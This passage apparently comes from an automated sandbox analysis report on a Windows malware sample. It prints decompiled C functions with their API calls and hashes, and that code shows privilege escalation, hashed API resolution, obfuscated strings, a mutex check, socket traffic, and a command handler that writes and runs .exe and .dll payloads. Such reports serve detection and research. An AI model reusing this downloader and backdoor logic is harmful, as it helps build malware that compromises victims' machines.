                                  				/* 00406589 */ 		AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                                  				/* 0040658d */ 		_t31 =  !=  ? 1 : 0; // the condition tested here was lost by the decompiler
                                  				/* 00406590 */ 	}
                                  				/* 00406594 */ 	E00403C40(_v8);
                                  				               	return _t31;
                                  				/* 0040659a */ }
                                  				/* 004065a1 */ return _t14; // OpenProcessToken failed: returns 0
                                  			}

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                  • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 3615134276-2896544425
                                  • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                  • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                  • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                  • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E0041289A(intOrPtr _a4) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* _t15;
                                  				void* _t22;
                                  				void* _t27;
                                  				signed int _t30;
                                  				void* _t34;
                                  				signed int _t42;
                                  				void* _t76;
                                  				void* _t80;
                                  				signed int _t82;
                                  				void* _t83;
                                  				void* _t84;
                                  				void* _t86;
                                  				void* _t87;
                                  				void* _t88;
                                  				void* _t90;
                                  				void* _t91;
                                  				void* _t92;
                                  				void* _t93;
                                  				void* _t94;
                                  				void* _t95;
                                  				void* _t96;
                                  				void* _t97;
                                  
                                  				_push(_t44);
                                  				_push("\r\n\r\n");
                                  				_t2 = E00405EF6(_a4) + 4; // 0x4
                                  				_t40 = _t2;
                                  				_v12 = _t2;
                                  				_t80 = E00402B7C(0x10);
                                  				_t97 = _t96 + 0xc;
                                  				if(_t80 == 0) {
                                  					_t80 = 0;
                                  					__eflags = 0;
                                  				} else {
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  					asm("stosd");
                                  				}
                                  				if(_t80 == 0) {
                                  					L48:
                                  					E00402BAB(_a4);
                                  					return 0;
                                  				} else {
                                  					_t15 = E00412870(_t80, _t40, 0xa); // executed
                                  					_t42 = E00412F75(_t15, _t80);
                                  					_v8 = _t42;
                                  					E00402BAB(_t80);
                                  					if(_t42 > 8) {
                                  						_t43 = E00402B7C(0x10);
                                  						if(_t18 == 0) {
                                  							_t43 = 0;
                                  							__eflags = 0;
                                  						} else {
                                  							asm("stosd");
                                  							asm("stosd");
                                  							asm("stosd");
                                  							asm("stosd");
                                  						}
                                  						_t21 = E00412F75(E00412F75(E00412870(_t43, _v12, _v8), _t43), _t43);
                                  						_t82 = _t21;
                                  						_v8 = _t21;
                                  						while(_t82 != 0) {
                                  							_t22 = E00412F75(_t21, _t43);
                                  							__eflags = _t22 - 0xffffffff;
                                  							if(_t22 == 0xffffffff) {
                                  								break;
                                  							}
                                  							_t83 = E00412F75(_t22, _t43);
                                  							__eflags = _t83 - 0xffffffff;
                                  							if(_t83 == 0xffffffff) {
                                  								break;
                                  							}
                                  							E00412F75(_t24, _t43);
                                  							_t76 = E00412F8F();
                                  							__eflags = _t83 - 0xa;
                                  							if(__eflags > 0) {
                                  								_t84 = _t83 - 0xe;
                                  								__eflags = _t84;
                                  								if(_t84 == 0) {
                                  									_t21 = E00413B81(0);
                                  									L43:
                                  									L44:
                                  									_t82 = _v8 - 1;
                                  									_v8 = _t82;
                                  									__eflags = _t76;
                                  									if(_t76 != 0) {
                                  										_t21 = E00402BAB(_t76);
                                  									}
                                  									continue;
                                  								}
                                  								_t86 = _t84 - 1;
                                  								__eflags = _t86;
                                  								if(__eflags == 0) {
                                  									_t87 = E004059D8(__eflags, _t76);
                                  									__eflags = _t87;
                                  									if(_t87 == 0) {
                                  										goto L44;
                                  									}
                                  									_t27 = E0040648B(_t76, _t87, 0, 0, L".exe", 0x1a, 0, L"-u");
                                  									_t97 = _t97 + 0x1c;
                                  									__eflags = _t27;
                                  									if(__eflags != 0) {
                                  										E004067C9(_t43, __eflags, 0);
                                  										E00413B81(0);
                                  									}
                                  									L26:
                                  									_t21 = E00402BAB(_t87);
                                  									goto L43;
                                  								}
                                  								_t88 = _t86 - 1;
                                  								__eflags = _t88;
                                  								if(_t88 == 0) {
                                  									_push(_t76);
                                  									_t30 = E00405EE4();
                                  									_t21 = _t30 * 0x3e8;
                                  									 *0x49fddc = _t30 * 0x3e8;
                                  									goto L43;
                                  								}
                                  								_t89 = _t88 - 1;
                                  								__eflags = _t88 - 1;
                                  								if(__eflags != 0) {
                                  									goto L44;
                                  								}
                                  								E004067C9(_t43, __eflags, _t89);
                                  								_t21 = E00413B81(_t89);
                                  								L19:
                                  								goto L43;
                                  							}
                                  							if(__eflags == 0) {
                                  								_t21 = E00413003(__eflags);
                                  								goto L44;
                                  							}
                                  							_t90 = _t83;
                                  							__eflags = _t90;
                                  							if(__eflags == 0) {
                                  								_t91 = E004059D8(__eflags, _t76);
                                  								__eflags = _t91;
                                  								if(_t91 != 0) {
                                  									E0040648B(_t76, _t91, 0, 0, L".exe", 0x1a, 0, 0);
                                  									_t21 = E00402BAB(_t91);
                                  									_t97 = _t97 + 0x20;
                                  								}
                                  								goto L44;
                                  							}
                                  							_t92 = _t90 - 1;
                                  							__eflags = _t92;
                                  							if(__eflags == 0) {
                                  								_t87 = E004059D8(__eflags, _t76);
                                  								__eflags = _t87;
                                  								if(_t87 == 0) {
                                  									goto L44;
                                  								}
                                  								_push(".");
                                  								_t34 = E00405EFF(_t87);
                                  								__eflags = _t34;
                                  								if(_t34 != 0) {
                                  									L22:
                                  									_push(0);
                                  									_push(1);
                                  									_push(0x1a);
                                  									_push(_t34);
                                  									_push(0);
                                  									_push(0);
                                  									L25:
                                  									_push(_t87);
                                  									E0040648B(_t76);
                                  									_t97 = _t97 + 0x1c;
                                  									goto L26;
                                  								}
                                  								_push(_t34);
                                  								_push(1);
                                  								_push(0x1a);
                                  								_push(L".dll");
                                  								L24:
                                  								_push(_t34);
                                  								_push(_t34);
                                  								goto L25;
                                  							}
                                  							_t93 = _t92 - 1;
                                  							__eflags = _t93;
                                  							if(__eflags == 0) {
                                  								_t87 = E004059D8(__eflags, _t76);
                                  								__eflags = _t87;
                                  								if(_t87 == 0) {
                                  									goto L44;
                                  								}
                                  								_push(".");
                                  								_t34 = E00405EFF(_t87);
                                  								__eflags = _t34;
                                  								if(_t34 == 0) {
                                  									_t34 = 0;
                                  									__eflags = 0;
                                  									_push(0);
                                  									_push(1);
                                  									_push(0x1a);
                                  									_push(L".exe");
                                  									goto L24;
                                  								}
                                  								goto L22;
                                  							}
                                  							_t94 = _t93 - 6;
                                  							__eflags = _t94;
                                  							if(_t94 != 0) {
                                  								goto L44;
                                  							}
                                  							_t95 = E00413C87(_t43, L"hdb", _t94);
                                  							__eflags = _t95;
                                  							if(_t95 == 0) {
                                  								goto L44;
                                  							} else {
                                  								_push(_t95);
                                  								E00403D44();
                                  								_t21 = E00402BAB(_t95);
                                  								goto L19;
                                  							}
                                  						}
                                  						E00402BAB(_t43);
                                  					}
                                  					goto L48;
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateFree
                                  • String ID: $.dll$.exe$hdb
                                  • API String ID: 576844849-2025675902
                                  • Opcode ID: 91d734af9a23ec44f2541a9f1e7fc2d4456d666c8a1ab295d144aebfed0d9c46
                                  • Instruction ID: 70dff955ffdbf613c1a4fa08e3d1fc98b678eebc215b8ce7432258245e9d9c55
                                  • Opcode Fuzzy Hash: 91d734af9a23ec44f2541a9f1e7fc2d4456d666c8a1ab295d144aebfed0d9c46
                                  • Instruction Fuzzy Hash: DE51D472A056213AE7257A754E42FFF61589F51BA4F10013FF801F62C2EDEC4DA211AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402B7C(long _a4) {
                                  				void* _t4;
                                  				void* _t7;
                                  
                                  				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                                  				_t7 = _t4;
                                  				if(_t7 != 0) {
                                  					E00402B4E(_t7, 0, _a4);
                                  				}
                                  				return _t7;
                                  			}

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                  • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                  • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                  • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406069(WCHAR* _a4, DWORD* _a8) {
                                  				int _t4;
                                  				void* _t5;
                                  
                                  				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                                  				_t4 = GetUserNameW(_a4, _a8); // executed
                                  				return _t4;
                                  			}

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                  • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                  • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                  • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: recv
                                  • String ID:
                                  • API String ID: 1507349165-0
                                  • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                  • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                  • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                  • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                                  				int _v8;
                                  				long _v12;
                                  				int _v16;
                                  				int _v20;
                                  				char _v24;
                                  				char _v28;
                                  				char _v32;
                                  				intOrPtr* _t25;
                                  				int _t27;
                                  				int _t30;
                                  				int _t31;
                                  				int _t36;
                                  				int _t37;
                                  				intOrPtr* _t39;
                                  				int _t40;
                                  				long _t44;
                                  				intOrPtr* _t45;
                                  				int _t46;
                                  				void* _t48;
                                  				int _t49;
                                  				void* _t67;
                                  				void* _t68;
                                  				void* _t74;
                                  
                                  				_t48 = __ebx;
                                  				_t67 = 0;
                                  				_v8 = 0;
                                  				E00402BF2();
                                  				_t68 = __eax;
                                  				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                                  				_t2 =  &_v8; // 0x414449
                                  				_push(1);
                                  				_push(8);
                                  				_push(_t68);
                                  				if( *_t25() != 0) {
                                  					L4:
                                  					_t27 = E00402B7C(0x208);
                                  					_v20 = _t27;
                                  					__eflags = _t27;
                                  					if(_t27 != 0) {
                                  						E0040338C(_t27, _t67, 0x104);
                                  						_t74 = _t74 + 0xc;
                                  					}
                                  					_push(_t48);
                                  					_t49 = E00402B7C(0x208);
                                  					__eflags = _t49;
                                  					if(_t49 != 0) {
                                  						E0040338C(_t49, _t67, 0x104);
                                  						_t74 = _t74 + 0xc;
                                  					}
                                  					_v28 = 0x208;
                                  					_v24 = 0x208;
                                  					_t7 =  &_v8; // 0x414449
                                  					_v12 = _t67;
                                  					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                                  					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                                  					__eflags = _t30;
                                  					if(_t30 == 0) {
                                  						_t36 = E00402B7C(_v12);
                                  						_v16 = _t36;
                                  						__eflags = _t36;
                                  						if(_t36 != 0) {
                                  							_t14 =  &_v8; // 0x414449, executed
                                  							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                                  							__eflags = _t37;
                                  							if(_t37 != 0) {
                                  								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                                  								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                                  								__eflags = _t40;
                                  								if(__eflags != 0) {
                                  									_t67 = E00405B6F(__eflags, L"%s", _t49);
                                  								}
                                  							}
                                  							E00402BAB(_v16);
                                  						}
                                  					}
                                  					__eflags = _v8;
                                  					if(_v8 != 0) {
                                  						E00403C40(_v8); // executed
                                  					}
                                  					__eflags = _t49;
                                  					if(_t49 != 0) {
                                  						E00402BAB(_t49);
                                  					}
                                  					_t31 = _v20;
                                  					__eflags = _t31;
                                  					if(_t31 != 0) {
                                  						E00402BAB(_t31);
                                  					}
                                  					return _t67;
                                  				}
                                  				_t44 = GetLastError();
                                  				if(_t44 == 0x3f0) {
                                  					E004060AC();
                                  					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                                  					_t3 =  &_v8; // 0x414449
                                  					_t46 =  *_t45(_t44, 8, _t3);
                                  					__eflags = _t46;
                                  					if(_t46 == 0) {
                                  						goto L2;
                                  					}
                                  					goto L4;
                                  				}
                                  				L2:
                                  				return 0;
                                  			}

                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                  • _wmemset.LIBCMT ref: 00406244
                                  • _wmemset.LIBCMT ref: 00406261
                                  • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: _wmemset$ErrorInformationLastToken
                                  • String ID: IDA$IDA
                                  • API String ID: 487585393-2020647798
                                  • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                  • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                  • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                  • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                                  				signed int _v8;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				void _v40;
                                  				void* _t23;
                                  				signed int _t24;
                                  				signed int* _t25;
                                  				signed int _t30;
                                  				signed int _t31;
                                  				signed int _t33;
                                  				signed int _t41;
                                  				void* _t42;
                                  				signed int* _t43;
                                  
                                  				_v8 = _v8 & 0x00000000;
                                  				_t33 = 8;
                                  				memset( &_v40, 0, _t33 << 2);
                                  				_v32 = 1;
                                  				_t23 =  &_v40;
                                  				_v28 = 6;
                                  				_v36 = 2;
                                  				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                                  				if(_t23 == 0) {
                                  					_t24 = E00402B7C(4);
                                  					_t43 = _t24;
                                  					_t31 = _t30 | 0xffffffff;
                                  					 *_t43 = _t31;
                                  					_t41 = _v8;
                                  					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                                  					 *_t43 = _t24;
                                  					if(_t24 != _t31) {
                                  						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                                  						if(_t24 == _t31) {
                                  							E00404DE5(_t24,  *_t43);
                                  							 *_t43 = _t31;
                                  						}
                                  						__imp__freeaddrinfo(_v8);
                                  						if( *_t43 != _t31) {
                                  							_t25 = _t43;
                                  							goto L10;
                                  						} else {
                                  							E00402BAB(_t43);
                                  							L8:
                                  							_t25 = 0;
                                  							L10:
                                  							return _t25;
                                  						}
                                  					}
                                  					E00402BAB(_t43);
                                  					__imp__freeaddrinfo(_v8);
                                  					goto L8;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                  • socket.WS2_32(?,?,?), ref: 00404E7A
                                  • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: freeaddrinfogetaddrinfosocket
                                  • String ID:
                                  • API String ID: 2479546573-0
                                  • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                  • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                  • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                  • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 74%
                                  			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                                  				struct _SECURITY_ATTRIBUTES* _v8;
                                  				char _v12;
                                  				long _v16;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* _t16;
                                  				intOrPtr* _t25;
                                  				long* _t28;
                                  				void* _t30;
                                  				int _t32;
                                  				intOrPtr* _t33;
                                  				void* _t35;
                                  				void* _t42;
                                  				intOrPtr _t43;
                                  				long _t44;
                                  				struct _OVERLAPPED* _t46;
                                  
                                  				_t46 = 0;
                                  				_t35 = 0;
                                  				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                                  				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                  				_t42 = _t16;
                                  				_v8 = _t42;
                                  				if(_t42 == 0xffffffff) {
                                  					__eflags = _a12;
                                  					if(_a12 == 0) {
                                  						L10:
                                  						return _t35;
                                  					}
                                  					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                                  					__eflags = _t43;
                                  					if(_t43 == 0) {
                                  						goto L10;
                                  					}
                                  					_push(0);
                                  					__eflags = E00403C59(_a4, _t43);
                                  					if(__eflags != 0) {
                                  						_v8 = 0;
                                  						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                                  						_push(_t43);
                                  						 *_a8 = _v8;
                                  						E00403D44();
                                  					}
                                  					E00402BAB(_t43);
                                  					return _t46;
                                  				}
                                  				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                                  				_t44 =  *_t25(_t42,  &_v12);
                                  				if(_v12 != 0 || _t44 > 0x40000000) {
                                  					L8:
                                  					_t45 = _v8;
                                  					goto L9;
                                  				} else {
                                  					_t28 = _a8;
                                  					if(_t28 != 0) {
                                  						 *_t28 = _t44;
                                  					}
                                  					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                                  					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                                  					_t35 = _t30;
                                  					if(_t35 == 0) {
                                  						goto L8;
                                  					} else {
                                  						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                                  						_t45 = _v8;
                                  						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                                  						if(_t32 == 0) {
                                  							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                                  							 *_t33(_t35, _t46, 0x8000);
                                  							_t35 = _t46;
                                  						}
                                  						L9:
                                  						E00403C40(_t45); // executed
                                  						goto L10;
                                  					}
                                  				}
                                  			}

                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$AllocCreateReadVirtual
                                  • String ID: .tmp
                                  • API String ID: 3585551309-2986845003
                                  • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                  • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                  • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                  • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00413866(void* __eflags) {
                                  				short _v6;
                                  				short _v8;
                                  				short _v10;
                                  				short _v12;
                                  				short _v14;
                                  				short _v16;
                                  				short _v18;
                                  				short _v20;
                                  				short _v22;
                                  				char _v24;
                                  				short _v28;
                                  				short _v30;
                                  				short _v32;
                                  				short _v34;
                                  				short _v36;
                                  				short _v38;
                                  				short _v40;
                                  				short _v42;
                                  				short _v44;
                                  				short _v46;
                                  				char _v48;
                                  				short _v52;
                                  				short _v54;
                                  				short _v56;
                                  				short _v58;
                                  				short _v60;
                                  				short _v62;
                                  				short _v64;
                                  				short _v66;
                                  				short _v68;
                                  				short _v70;
                                  				short _v72;
                                  				short _v74;
                                  				char _v76;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* _t38;
                                  				short _t43;
                                  				short _t44;
                                  				short _t45;
                                  				short _t46;
                                  				short _t47;
                                  				short _t48;
                                  				short _t50;
                                  				short _t51;
                                  				short _t52;
                                  				short _t54;
                                  				short _t55;
                                  				intOrPtr* _t57;
                                  				intOrPtr* _t59;
                                  				intOrPtr* _t61;
                                  				void* _t63;
                                  				WCHAR* _t65;
                                  				long _t68;
                                  				void* _t75;
                                  				short _t76;
                                  				short _t78;
                                  				short _t83;
                                  				short _t84;
                                  				short _t85;
                                  
                                  				E00402C6C(_t38);
                                  				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                                  				SetErrorMode(3); // executed
                                  				_t43 = 0x4f;
                                  				_v76 = _t43;
                                  				_t44 = 0x4c;
                                  				_v74 = _t44;
                                  				_t45 = 0x45;
                                  				_v72 = _t45;
                                  				_t46 = 0x41;
                                  				_v70 = _t46;
                                  				_t47 = 0x55;
                                  				_v68 = _t47;
                                  				_t48 = 0x54;
                                  				_t76 = 0x33;
                                  				_t84 = 0x32;
                                  				_t83 = 0x2e;
                                  				_t78 = 0x64;
                                  				_t85 = 0x6c;
                                  				_v66 = _t48;
                                  				_v52 = 0;
                                  				_t50 = 0x77;
                                  				_v48 = _t50;
                                  				_t51 = 0x73;
                                  				_v46 = _t51;
                                  				_t52 = 0x5f;
                                  				_v42 = _t52;
                                  				_v28 = 0;
                                  				_t54 = 0x6f;
                                  				_v24 = _t54;
                                  				_t55 = 0x65;
                                  				_v20 = _t55;
                                  				_v64 = _t76;
                                  				_v62 = _t84;
                                  				_v60 = _t83;
                                  				_v58 = _t78;
                                  				_v56 = _t85;
                                  				_v54 = _t85;
                                  				_v44 = _t84;
                                  				_v40 = _t76;
                                  				_v38 = _t84;
                                  				_v36 = _t83;
                                  				_v34 = _t78;
                                  				_v32 = _t85;
                                  				_v30 = _t85;
                                  				_v22 = _t85;
                                  				_v18 = _t76;
                                  				_v16 = _t84;
                                  				_v14 = _t83;
                                  				_v12 = _t78;
                                  				_v10 = _t85;
                                  				_v8 = _t85;
                                  				_v6 = 0;
                                  				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                  				 *_t57( &_v76);
                                  				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                  				 *_t59( &_v48);
                                  				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                                  				_t81 =  &_v24;
                                  				 *_t61( &_v24); // executed
                                  				_t63 = E00414059(); // executed
                                  				if(_t63 != 0) {
                                  					_t65 = E00413D97(0);
                                  					E004031E5(0, 0, 0xcf167df4, 0, 0);
                                  					CreateMutexW(0, 1, _t65); // executed
                                  					_t68 = GetLastError();
                                  					_t92 = _t68 - 0xb7;
                                  					if(_t68 == 0xb7) {
                                  						E00413B81(0);
                                  						_pop(_t81); // executed
                                  					}
                                  					E00413003(_t92); // executed
                                  					E00412B2E(_t92); // executed
                                  					E00412D31(_t81, _t84); // executed
                                  					E00413B3F();
                                  					E00413B81(0);
                                  					 *0x49fdd0 = 1;
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                  • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                  • GetLastError.KERNEL32 ref: 0041399E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Error$CreateLastModeMutex
                                  • String ID:
                                  • API String ID: 3448925889-0
                                  • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                  • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                  • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                  • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                                  				long _v8;
                                  				void* _t7;
                                  				long _t10;
                                  				void* _t21;
                                  				struct _OVERLAPPED* _t24;
                                  
                                  				_t14 = __ebx;
                                  				_t24 = 0;
                                  				_v8 = 0;
                                  				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                                  				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                                  				_t21 = _t7;
                                  				if(_t21 != 0xffffffff) {
                                  					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                                  					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                                  					if(_t10 != 0xffffffff) {
                                  						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                                  						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                                  						_t24 =  !=  ? 1 : 0;
                                  					}
                                  					E00403C40(_t21); // executed
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
